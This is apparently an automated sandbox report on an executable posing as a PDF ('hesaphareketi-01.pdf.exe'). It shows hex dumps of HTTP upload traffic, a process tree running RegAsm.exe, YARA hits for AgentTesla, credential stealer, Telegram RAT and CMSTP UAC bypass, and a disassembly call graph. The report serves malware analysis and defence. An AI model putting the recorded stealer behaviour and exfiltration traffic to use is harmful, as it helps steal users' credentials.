f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:45:31 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:45:31 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:45:31 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:45:31 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 39 63 30 37 36 36 39 65 32 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dc7b9c07669e21--
                                                2024-05-24 05:45:31 UTC402INHTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:45:31 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:01:41:22
                                                Start date:24/05/2024
                                                Path:C:\Users\user\Desktop\hesaphareketi-01.pdf.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\hesaphareketi-01.pdf.exe"
                                                Imagebase:0x7ff7341d0000
                                                File size:2'066'432 bytes
                                                MD5 hash:8F184DAF4D3D0FAC93DB93C798E616ED
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1208684446.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1218633530.000002368203A000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:01:41:22
                                                Start date:24/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:01:41:23
                                                Start date:24/05/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                Imagebase:0x450000
                                                File size:65'440 bytes
                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3672129866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.3677180762.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:6.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:27.3%
                                                  Total number of Nodes:961
                                                  Total number of Limit Nodes:15
                                                  execution_graph 17788 7ff7341dfc50 17789 7ff7341dfc75 17788->17789 17790 7ff7341dfc6a 17788->17790 17791 7ff7341dfca2 VirtualAlloc 17789->17791 17796 7ff7341dfcf6 17789->17796 17792 7ff7341dfcdd 17791->17792 17791->17796 17793 7ff734238e70 _swprintf_c_l 3 API calls 17792->17793 17794 7ff7341dfcee 17793->17794 17795 7ff7341dfd41 VirtualFree 17794->17795 17794->17796 17795->17796 16914 7ff7341d6740 16919 7ff7341d4a90 16914->16919 16916 7ff7341d6752 16925 7ff73428c430 16916->16925 16920 7ff7341d4ab6 16919->16920 16924 7ff7341d4ad4 16920->16924 16932 7ff7341daad0 FlsGetValue 16920->16932 16922 7ff7341d4acc 16923 7ff7341d5780 6 API calls 16922->16923 16923->16924 16924->16916 16935 7ff7341d6480 16925->16935 16927 7ff73428c451 16951 7ff734274210 16927->16951 16930 7ff73428c456 16954 7ff7341d6880 16930->16954 16959 7ff7341d6870 16930->16959 16933 7ff7341daaf8 FlsSetValue 16932->16933 16934 7ff7341daaea RaiseFailFastException 16932->16934 16934->16933 16940 7ff7341d64a5 16935->16940 16936 7ff7341d64b9 16936->16927 16937 7ff7341d657f 16938 7ff7341d6586 16937->16938 16939 7ff7341d659f 16937->16939 16963 7ff7341db030 16938->16963 16941 7ff7341d65cf 16939->16941 16966 7ff7341d6210 GetLastError 16939->16966 16940->16936 16940->16937 16945 7ff7341d6528 16940->16945 16948 7ff7341d6547 16940->16948 16949 7ff7341d6566 16940->16949 16941->16927 16942 7ff7341d4a90 9 API calls 16942->16937 16944 7ff7341d6592 RaiseFailFastException 16944->16939 16947 7ff7341d6530 Sleep 16945->16947 16947->16947 16947->16948 16948->16949 16950 7ff7341d6559 RaiseFailFastException 16948->16950 16949->16942 16950->16949 16969 7ff7342742c0 16951->16969 16953 7ff73427421e 16953->16930 16956 7ff7341d6884 16954->16956 16955 7ff7341d6890 WaitForSingleObjectEx 16955->16956 16957 7ff7341d68c7 16955->16957 16956->16955 16958 7ff7341d68b9 16956->16958 16957->16930 16958->16930 16960 7ff7341dfad0 16959->16960 16961 7ff7341dfae1 SetEvent 16960->16961 16962 7ff7341dfada 16960->16962 16961->16930 16962->16930 16964 7ff7341db044 16963->16964 16964->16964 16965 7ff7341db04d GetStdHandle WriteFile 16964->16965 16965->16944 16967 7ff7341d6240 16966->16967 16968 7ff7341d6266 SetLastError 16967->16968 16971 7ff7342742df 16969->16971 16970 7ff73427432e 16970->16953 16971->16970 16972 7ff73427430b CoInitializeEx 16971->16972 16973 7ff734274322 16972->16973 16973->16970 16974 7ff73427437a 16973->16974 16982 7ff7341d22d0 16973->16982 16975 7ff7341d22d0 17 API calls 16974->16975 16977 7ff734274386 16975->16977 16980 7ff7341d25d0 17 API calls 16977->16980 16978 7ff734274367 16988 7ff7341d25d0 16978->16988 16981 7ff734274399 16980->16981 16983 7ff7341d22fb 16982->16983 16985 7ff7341d2302 16982->16985 16983->16978 16984 7ff7341d2359 16984->16978 16985->16984 16986 7ff7341d25d0 17 API calls 16985->16986 16987 7ff73428c971 16986->16987 16989 7ff7341d268b 16988->16989 16994 7ff73428ca50 16989->16994 16995 7ff73428ca62 16994->16995 16998 7ff73428cb00 16995->16998 16997 7ff73428caa1 17009 7ff7341d8700 16998->17009 17001 7ff73428cc0c 17037 7ff7341d3960 17001->17037 17002 7ff73428cb7a 17002->17001 17029 7ff7341d8830 17002->17029 17004 7ff7341d8700 10 API calls 17008 7ff73428cc6b 17004->17008 17006 7ff73428ccba 17006->16997 17007 7ff7341d8830 16 API calls 17007->17008 17008->17006 17008->17007 17010 7ff7341d8742 17009->17010 17011 7ff7341d8787 17010->17011 17013 7ff7341d8747 17010->17013 17012 7ff7341d87a1 17011->17012 17015 7ff7341dde30 4 API calls 17011->17015 17018 7ff7341d87d2 17012->17018 17019 7ff7341d87bd 17012->17019 17014 7ff7341d8761 17013->17014 17041 7ff7341dde30 17013->17041 17047 7ff7341d7b20 17014->17047 17015->17012 17020 7ff7341d82d0 2 API calls 17018->17020 17022 7ff7341d82d0 2 API calls 17019->17022 17023 7ff7341d87c9 17020->17023 17022->17023 17025 7ff7341d8785 17023->17025 17026 7ff7341dde30 4 API calls 17023->17026 17027 7ff7341d8809 17025->17027 17060 7ff7341d7470 17025->17060 17026->17025 17027->17002 17030 7ff7341d8871 17029->17030 17092 7ff7341d7ec0 17030->17092 17032 7ff7341d8880 17033 7ff7341d88a1 17032->17033 17034 7ff7341dde30 4 API calls 17032->17034 17035 7ff7341d88b2 17033->17035 17036 7ff7341d7470 2 API calls 17033->17036 17034->17033 17035->17002 17036->17035 17038 7ff7341d3986 17037->17038 17039 7ff7341d3997 17038->17039 17040 7ff7341d398a RaiseFailFastException 17038->17040 17039->17004 17040->17039 17042 7ff7341ddedc 17041->17042 17044 7ff7341dde6b 17041->17044 17042->17014 17044->17042 17046 7ff7341ddea4 17044->17046 17066 7ff7341ddb50 17044->17066 17046->17042 17074 7ff7341ddef0 17046->17074 17049 7ff7341d7b3d _swprintf_c_l 17047->17049 17048 7ff7341d7d10 17055 7ff7341d82d0 17048->17055 17049->17048 17050 7ff7341d7cef 17049->17050 17051 7ff7341d7ce7 17049->17051 17052 7ff7341d7cd8 RaiseFailFastException 17049->17052 17050->17048 17054 7ff7341dde30 4 API calls 17050->17054 17086 7ff7341d8540 17051->17086 17052->17050 17054->17048 17056 7ff7341d8337 17055->17056 17057 7ff7341d82e2 17055->17057 17056->17025 17057->17056 17058 7ff7341d7470 2 API calls 17057->17058 17059 7ff7341d8312 17058->17059 17059->17025 17061 7ff7341d7488 17060->17061 17062 7ff7341d7490 17060->17062 17061->17062 17063 7ff7341d7506 17061->17063 17064 7ff7341d74f9 RaiseFailFastException 17061->17064 17062->17027 17063->17062 17065 7ff7341d7521 RaiseFailFastException 17063->17065 17064->17063 17065->17062 17070 7ff7341ddb74 17066->17070 17069 7ff734238e70 _swprintf_c_l 3 API calls 17071 7ff7341ddc08 17069->17071 17070->17071 17078 7ff734238e70 17070->17078 17073 7ff7341ddc95 ISource 17071->17073 17081 7ff7341dacb0 GetCurrentThreadId 17071->17081 17073->17046 17075 7ff7341ddf45 17074->17075 17077 7ff7341ddf4c 17074->17077 17082 7ff7341dd980 17075->17082 17077->17042 17079 7ff734238d70 _swprintf_c_l malloc RtlPcToFileHeader RaiseException 17078->17079 17080 7ff7341ddbdd 17079->17080 17080->17069 17080->17073 17081->17073 17084 7ff7341dd9aa _swprintf_c_l 17082->17084 17083 7ff7341dd9d1 17083->17077 17084->17083 17085 7ff734238e70 _swprintf_c_l malloc RtlPcToFileHeader RaiseException 17084->17085 17085->17083 17090 7ff7341d8554 17086->17090 17087 7ff7341d86be RaiseFailFastException 17087->17090 17088 7ff7341d8623 RaiseFailFastException 17088->17090 17089 7ff7341d8639 RaiseFailFastException 17089->17090 17090->17087 17090->17088 17090->17089 17091 7ff7341d86d0 17090->17091 17091->17050 17106 7ff7341d7ef0 17092->17106 17093 7ff7341d7f43 RaiseFailFastException 17093->17106 17094 7ff7341d81de 17095 7ff7341d7b20 8 API calls 17094->17095 17100 7ff7341d81e4 17094->17100 17095->17100 17096 7ff7341d82b2 17096->17032 17097 7ff7341d820e RaiseFailFastException 17097->17100 17098 7ff7341d8231 17099 7ff7341d8540 3 API calls 17098->17099 17099->17100 17100->17096 17102 7ff7341d7470 2 API calls 17100->17102 17101 7ff7341d80a2 RaiseFailFastException 17101->17106 17103 7ff7341d8287 17102->17103 17103->17032 17105 7ff7341d7470 2 API calls 17105->17106 17106->17093 17106->17094 17106->17097 17106->17098 17106->17100 17106->17101 17106->17105 17107 7ff7341d8198 RaiseFailFastException 17106->17107 17108 7ff7341d81ae RaiseFailFastException 17106->17108 17109 7ff7341dde30 4 API calls 17106->17109 17110 7ff7341d7710 17106->17110 17107->17106 17108->17106 17109->17106 17111 7ff7341d773d 17110->17111 17112 7ff7341d7767 17110->17112 17113 7ff7341dde30 4 API calls 17111->17113 17114 7ff7341d78f6 17112->17114 17117 7ff7341d7794 17112->17117 17113->17112 17115 7ff7341d78fc RaiseFailFastException 17114->17115 17116 7ff7341d7909 17114->17116 17115->17116 17118 7ff7341d7470 2 API calls 17116->17118 17119 7ff7341d7470 2 API calls 17117->17119 17120 7ff7341d78e1 17118->17120 17119->17120 17120->17106 17121 7ff7341d3c80 17122 7ff7341d3cce 17121->17122 17125 7ff7341d9870 17122->17125 17124 7ff7341d3cde 17126 7ff7341d9899 17125->17126 17127 7ff7341d990c 17126->17127 17129 7ff7341e725e 17126->17129 17127->17124 17130 7ff7341e72c5 17129->17130 17131 7ff7341e729b 17129->17131 17137 7ff7341ecd40 17130->17137 17133 7ff7341e72a4 DebugBreak 17131->17133 17135 7ff7341e72a9 17131->17135 17133->17135 17134 7ff7341e72e8 17134->17135 17150 7ff7341e9c50 17134->17150 17135->17127 17139 7ff7341ecd6f 17137->17139 17138 7ff734210690 WaitForSingleObject 17138->17139 17139->17138 17140 7ff7342049a0 GetTickCount64 17139->17140 17142 7ff7341ece29 SwitchToThread 17139->17142 17143 7ff7341ecf4b 17139->17143 17146 7ff7341f3480 39 API calls 17139->17146 17147 7ff7341ece55 SwitchToThread 17139->17147 17149 7ff7341ece1d SwitchToThread 17139->17149 17157 7ff7341ed9f0 17139->17157 17176 7ff7342104d0 17139->17176 17190 7ff7341e26f0 17139->17190 17193 7ff7341ed470 17139->17193 17140->17139 17142->17139 17143->17134 17146->17139 17147->17139 17149->17139 17151 7ff7341e9c86 17150->17151 17155 7ff7341e9cbf 17150->17155 17152 7ff7341e9c99 SwitchToThread 17151->17152 17153 7ff7341e26f0 SleepEx 17151->17153 17151->17155 17152->17151 17153->17151 17154 7ff7341e9d95 ISource 17154->17135 17155->17154 17156 7ff7341e9d90 DebugBreak 17155->17156 17156->17154 17158 7ff7341edbe2 17157->17158 17159 7ff7341eda2c 17157->17159 17160 7ff7341eda9d 17159->17160 17161 7ff7341edbe7 17159->17161 17163 7ff7341edaac SwitchToThread 17160->17163 17161->17158 17207 7ff7341e6e90 17161->17207 17165 7ff7341edaba 17163->17165 17165->17158 17166 7ff7341edb61 SwitchToThread 17165->17166 17168 7ff7341edb8d SwitchToThread 17165->17168 17169 7ff7341e26f0 SleepEx 17165->17169 17175 7ff7341edb55 SwitchToThread 17165->17175 17203 7ff734210690 17165->17203 17166->17165 17168->17165 17169->17165 17175->17165 17177 7ff734210679 17176->17177 17178 7ff7342104ed 17176->17178 17177->17139 17213 7ff7341e1e90 17178->17213 17181 7ff734210667 17181->17139 17182 7ff7341e6e90 WaitForSingleObject 17188 7ff73421054d 17182->17188 17183 7ff734210650 17183->17139 17184 7ff7342105d9 SwitchToThread 17184->17188 17185 7ff734210605 SwitchToThread 17185->17188 17186 7ff7341e26f0 SleepEx 17186->17188 17187 7ff734210690 WaitForSingleObject 17187->17188 17188->17183 17188->17184 17188->17185 17188->17186 17188->17187 17189 7ff7342105cd SwitchToThread 17188->17189 17189->17188 17191 7ff7341e26f4 SleepEx 17190->17191 17192 7ff7341e26fd 17190->17192 17191->17192 17192->17139 17194 7ff7341ed61b 17193->17194 17195 7ff7341ed4ac 17193->17195 17195->17194 17196 7ff7341e26f0 SleepEx 17195->17196 17198 7ff7341ed4ef 17196->17198 17197 7ff7341ed59a SwitchToThread 17197->17198 17198->17194 17198->17197 17199 7ff734210690 WaitForSingleObject 17198->17199 17200 7ff7341ed5c6 SwitchToThread 17198->17200 17201 7ff7341e26f0 SleepEx 17198->17201 17202 7ff7341ed58e SwitchToThread 17198->17202 17199->17198 17200->17198 17201->17198 17202->17198 17204 7ff7342106a6 17203->17204 17205 7ff7342106dd 17204->17205 17211 7ff7341e2a50 WaitForSingleObject 17204->17211 17205->17165 17208 7ff7341e6ea8 17207->17208 17212 7ff7341e2a50 WaitForSingleObject 17208->17212 17214 7ff7341e1f7f GlobalMemoryStatusEx 17213->17214 17215 7ff7341e1ec7 GetCurrentProcess 17213->17215 17218 7ff7341e1ee8 17214->17218 17216 7ff7341e1ee0 17215->17216 17216->17214 17216->17218 17220 7ff734238e50 17218->17220 17221 7ff734238e59 17220->17221 17222 7ff73423983c IsProcessorFeaturePresent 17221->17222 17223 7ff7341e2058 17221->17223 17224 7ff734239854 17222->17224 17223->17181 17223->17182 17229 7ff734239910 RtlCaptureContext 17224->17229 17230 7ff73423992a RtlLookupFunctionEntry 17229->17230 17231 7ff734239867 17230->17231 17232 7ff734239940 RtlVirtualUnwind 17230->17232 17233 7ff734239808 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17231->17233 17232->17230 17232->17231 17234 7ff7341d55c0 17264 7ff7341dae30 FlsAlloc 17234->17264 17236 7ff7341d572e 17237 7ff7341d55cb 17237->17236 17277 7ff7341dacd0 GetModuleHandleExW 17237->17277 17239 7ff7341d55eb 17278 7ff7341d6f20 17239->17278 17241 7ff7341d55f3 17241->17236 17286 7ff7341db560 17241->17286 17245 7ff7341d5610 17245->17236 17246 7ff7341d5638 RtlAddVectoredExceptionHandler 17245->17246 17247 7ff7341d5651 17246->17247 17248 7ff7341d564c 17246->17248 17323 7ff7341dd5c0 17247->17323 17250 7ff7341d5685 17248->17250 17251 7ff7341dd5c0 9 API calls 17248->17251 17252 7ff7341d56df 17250->17252 17300 7ff7341ddd30 17250->17300 17251->17250 17308 7ff7341d9d50 17252->17308 17255 7ff7341d56e4 17255->17236 17329 7ff7341d5270 17255->17329 17265 7ff7341dae50 17264->17265 17266 7ff7341daf7e 17264->17266 17340 7ff7341e3720 17265->17340 17266->17237 17268 7ff7341dae55 17269 7ff7341e24c0 10 API calls 17268->17269 17270 7ff7341dae5a 17269->17270 17270->17266 17271 7ff7341dd5c0 9 API calls 17270->17271 17272 7ff7341dae82 17271->17272 17273 7ff7341daea1 17272->17273 17274 7ff7341daeaa GetCurrentProcess GetProcessAffinityMask 17272->17274 17276 7ff7341daf18 17272->17276 17275 7ff7341daef4 QueryInformationJobObject 17273->17275 17274->17273 17275->17276 17276->17237 17277->17239 17279 7ff734238e70 _swprintf_c_l 3 API calls 17278->17279 17280 7ff7341d6f35 17279->17280 17281 7ff7341d6f74 17280->17281 17479 7ff7341dfbd0 17280->17479 17281->17241 17283 7ff7341d6f42 17283->17281 17284 7ff7341db220 InitializeCriticalSectionEx 17283->17284 17285 7ff7341d6f6d 17284->17285 17285->17241 17287 7ff7341db220 InitializeCriticalSectionEx 17286->17287 17288 7ff7341d5600 17287->17288 17288->17236 17289 7ff7341d6960 17288->17289 17290 7ff734238e70 _swprintf_c_l 3 API calls 17289->17290 17291 7ff7341d697e 17290->17291 17292 7ff7341d6a1a 17291->17292 17482 7ff7341d4bc0 17291->17482 17292->17245 17294 7ff7341d69b0 17295 7ff7341d69fa 17294->17295 17489 7ff7341d4cb0 17294->17489 17295->17245 17297 7ff7341d69bd 17299 7ff7341d69cd ISource 17297->17299 17493 7ff7341d4a40 17297->17493 17299->17245 17301 7ff7341ddd5b 17300->17301 17307 7ff7341dde06 17300->17307 17302 7ff734238e70 _swprintf_c_l 3 API calls 17301->17302 17303 7ff7341ddd7a 17302->17303 17304 7ff7341db220 InitializeCriticalSectionEx 17303->17304 17305 7ff7341ddda5 17304->17305 17306 7ff7341dddee GetSystemTimeAsFileTime 17305->17306 17306->17307 17307->17252 17309 7ff7342387ed 17308->17309 17310 7ff7341d9d89 EventRegister 17309->17310 17311 7ff7341d9e0c 17310->17311 17313 7ff7341d9e07 17310->17313 17312 7ff7341dd5c0 9 API calls 17311->17312 17312->17313 17498 7ff7341da630 17313->17498 17316 7ff7341d9e84 17316->17255 17317 7ff7341d9e5b 17317->17316 17516 7ff7341d67c0 17317->17516 17319 7ff7341d9e64 17319->17316 17523 7ff7341de7e0 17319->17523 17320 7ff7341d9e74 17320->17255 17326 7ff7341dd630 17323->17326 17324 7ff7341dd6b0 _wcsicmp 17324->17326 17328 7ff7341dd6cd 17324->17328 17325 7ff734238e50 8 API calls 17327 7ff7341dd7ad 17325->17327 17326->17324 17326->17328 17327->17248 17328->17325 17333 7ff7341d529a 17329->17333 17337 7ff7341d53fb 17329->17337 17330 7ff7341d5586 17330->17236 17338 7ff7341db220 17330->17338 17331 7ff7341db030 2 API calls 17332 7ff7341d557a RaiseFailFastException 17331->17332 17332->17330 17333->17337 17773 7ff7341dafe0 LoadLibraryExW 17333->17773 17335 7ff7341d5376 17335->17337 17776 7ff7341daf90 LoadLibraryExW 17335->17776 17337->17330 17337->17331 17339 7ff734238a63 InitializeCriticalSectionEx 17338->17339 17467 7ff7341d99a0 17340->17467 17343 7ff7341d99a0 9 API calls 17344 7ff7341e375e 17343->17344 17345 7ff7341d99a0 9 API calls 17344->17345 17346 7ff7341e3779 17345->17346 17347 7ff7341d99a0 9 API calls 17346->17347 17348 7ff7341e3794 17347->17348 17349 7ff7341d99a0 9 API calls 17348->17349 17350 7ff7341e37b4 17349->17350 17351 7ff7341d99a0 9 API calls 17350->17351 17352 7ff7341e37cf 17351->17352 17353 7ff7341d99a0 9 API calls 17352->17353 17354 7ff7341e37ef 17353->17354 17355 7ff7341d99a0 9 API calls 17354->17355 17356 7ff7341e380a 17355->17356 17357 7ff7341d99a0 9 API calls 17356->17357 17358 7ff7341e3825 17357->17358 17359 7ff7341d99a0 9 API calls 17358->17359 17360 7ff7341e3840 17359->17360 17361 7ff7341d99a0 9 API calls 17360->17361 17362 7ff7341e3860 17361->17362 17363 7ff7341d99a0 9 API calls 17362->17363 17364 7ff7341e3880 17363->17364 17473 7ff7341d9b60 17364->17473 17367 7ff7341d9b60 9 API calls 17368 7ff7341e38b0 17367->17368 17369 7ff7341d9b60 9 API calls 17368->17369 17370 7ff7341e38c5 17369->17370 17371 7ff7341d9b60 9 API calls 17370->17371 17372 7ff7341e38da 17371->17372 17373 7ff7341d9b60 9 API calls 17372->17373 17374 7ff7341e38ef 17373->17374 17375 7ff7341d9b60 9 API calls 17374->17375 17376 7ff7341e3909 17375->17376 17377 7ff7341d9b60 9 API calls 17376->17377 17378 7ff7341e391e 17377->17378 17379 7ff7341d9b60 9 API calls 17378->17379 17380 7ff7341e3933 17379->17380 17381 7ff7341d9b60 9 API calls 17380->17381 17382 7ff7341e3948 17381->17382 17383 7ff7341d9b60 9 API calls 17382->17383 17384 7ff7341e395d 17383->17384 17385 7ff7341d9b60 9 API calls 17384->17385 17386 7ff7341e3972 17385->17386 17387 7ff7341d9b60 9 API calls 17386->17387 17388 7ff7341e3987 17387->17388 17389 7ff7341d9b60 9 API calls 17388->17389 17390 7ff7341e39a1 17389->17390 17391 7ff7341d9b60 9 API calls 17390->17391 17392 7ff7341e39bb 17391->17392 17393 7ff7341d9b60 9 API calls 17392->17393 17394 7ff7341e39d0 17393->17394 17395 7ff7341d9b60 9 API calls 17394->17395 17396 7ff7341e39e5 17395->17396 17397 7ff7341d9b60 9 API calls 17396->17397 17398 7ff7341e39fa 17397->17398 17399 7ff7341d9b60 9 API calls 17398->17399 17400 7ff7341e3a0f 17399->17400 17401 7ff7341d9b60 9 API calls 17400->17401 17402 7ff7341e3a29 17401->17402 17403 7ff7341d9b60 9 API calls 17402->17403 17404 7ff7341e3a43 17403->17404 17405 7ff7341d9b60 9 API calls 17404->17405 17406 7ff7341e3a58 17405->17406 17407 7ff7341d9b60 9 API calls 17406->17407 17408 7ff7341e3a6d 17407->17408 17409 7ff7341d9b60 9 API calls 17408->17409 17410 7ff7341e3a82 17409->17410 17411 7ff7341d9b60 9 API calls 17410->17411 17412 7ff7341e3a97 17411->17412 17413 7ff7341d9b60 9 API calls 17412->17413 17414 